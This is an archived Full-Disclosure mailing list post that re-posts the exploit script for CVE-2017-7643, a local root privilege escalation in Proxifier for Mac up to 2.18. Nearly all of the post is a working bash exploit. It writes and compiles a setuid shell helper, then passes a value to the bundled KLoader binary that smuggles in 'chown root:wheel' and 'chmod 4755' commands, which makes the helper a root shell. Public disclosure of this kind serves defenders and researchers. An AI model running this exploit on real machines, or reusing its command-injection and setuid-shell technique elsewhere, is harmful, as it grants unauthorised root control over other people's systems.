| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <50A8F46A-CDC5-4FDD-A78D-AFE6000E4066@rkw.io>
Date: Tue, 11 Apr 2017 11:24:33 +0100
From: "Mark Wadham" <fd@....io>
To: fulldisclosure@...lists.org
Subject: Re: [FD] CVE-2017-7643 Local root privesc in Proxifier for Mac <=
2.18
Sorry, the exploit code got mangled :S
-------------------------
#!/bin/bash
#####################################################################
# Local root exploit for vulnerable KLoader binary distributed with #
# Proxifier for Mac v2.18 #
#####################################################################
# by m4rkw #
#####################################################################
cat > a.c <<EOF
#include <stdio.h>
#include <unistd.h>
int main()
{
setuid(0);
seteuid(0);
execl("/bin/bash", "bash", NULL);
return 0;
}
EOF
gcc -o /tmp/a a.c
rm -f a.c
/Applications/Proxifier.app/Contents/KLoader 'blah; chown root:wheel
/tmp/a ; chmod 4755 /tmp/a'
/tmp/a
-------------------------
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists